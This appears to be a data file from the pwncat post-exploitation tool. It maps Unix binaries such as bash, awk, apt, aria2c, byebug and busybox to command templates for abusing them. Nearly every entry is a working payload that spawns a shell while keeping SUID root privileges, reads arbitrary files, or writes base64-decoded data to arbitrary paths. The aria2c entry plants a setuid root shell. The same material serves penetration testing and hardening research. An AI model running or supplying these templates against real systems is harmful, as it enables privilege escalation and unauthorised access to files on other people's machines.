1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-30 20:34:15 +01:00
pwncat/data/gtfobins.json
2020-05-09 22:06:45 -04:00

148 lines
3.2 KiB
JSON

[
{
"name": "cat",
"read_file": "{path} {lfile}"
},
{
"name": "bash",
"shell": {
"script": "{command}",
"suid": ["-p"]
},
"read_file": "{path} -p -c \"cat {lfile}\"",
"write_file": {
"type": "base64",
"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
},
"command": "{path} -p -c {command}"
},
{
"name": "apt-get",
"shell": {
"need": ["changelog", "apt"],
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
},
{
"name": "apt",
"shell": {
"need": ["changelog", "apt"],
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
},
{
"name": "aria2c",
"shell": {
"script": "TF=$(mktemp); SHELL=$(mktemp); cp {shell} $SHELL; echo \"chown root:root $SHELL; chmod +sx $SHELL;\" > $TF;chmod +x $TF; {command}; sleep 1; $SHELL -p",
"need": ["--on-download-error=$TF","http://x"]
}
},
{
"name": "ash",
"shell": {
"script": "{command}",
"suid": ["-p"]
},
"read_file": "{path} -p -c \"cat {lfile}\"",
"write_file": {
"type": "base64",
"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
},
"command": "{path} -p -c {command}"
},
{
"name": "awk",
"shell": {
"script": "{command} 'BEGIN {{system(\"{shell} -p\")}}'"
},
"read_file": "{path} '//' {lfile}",
"write_file": {
"type": "base64",
"payload": "{path} -v LFILE={lfile} 'BEGIN {{ printf \"\" > LFILE; while ((\"echo \\\"{data}\\\" | base64 -d\" | getline) > 0){{ print >> LFILE }} }}'"
}
},
{
"name": "gawk",
"shell": {
"script": "{command} 'BEGIN {{system(\"{shell}\")}}'"
},
"read_file": "{path} '//' {lfile}",
"write_file": {
"type": "base64",
"payload": "{path} -v LFILE={lfile} 'BEGIN {{ printf \"\" > LFILE; while ((\"echo \\\"{data}\\\" | base64 -d\" | getline) > 0){{ print >> LFILE }} }}'"
}
},
{
"name": "base32",
"read_file": "{path} {lfile} | {path} -d"
},
{
"name": "base64",
"read_file": "{path} {lfile} | {path} -d"
},
{
"name": "bpftrace",
"shell": {
"script": "{command} -c {shell} -e 'END {{exit()}}'",
"suid": ["-p"]
}
},
{
"name": "bundler",
"shell": {
"script": "{command} help",
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
},
{
"name": "busctl",
"shell": {
"script": "{command}",
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
},
{
"name": "busybox",
"shell": {
"script": "{command} sh"
},
"read_file": "{path} -c \"cat {lfile}\"",
"write_file": {
"type": "base64",
"payload": "{path} -c \"echo -n {data} | base64 -d > {lfile}\""
}
},
{
"name": "byebug",
"shell": {
"script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command} --no-stop -q $TF",
"need": [
"--no-stop",
"-q"
]
},
"read_file": "TF=$(mktemp);echo 'system(\"cat {lfile}\")' > $TF;{command} --no-stop -q $TF",
"write_file": {
"type": "base64",
"payload": "TF=$(mktemp);echo 'system(\"echo {data} | base64 -d > {lfile}\")' > $TF;{path} --no-stop -q $TF"
}
},
{
"name": "dash",
"shell": {
"script": "{command}",
"suid": ["-p"]
},
"read_file": "{path} -p -c \"cat {lfile}\"",
"write_file": {
"type": "base64",
"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
},
"command": "{path} -p -c {command}"
}
]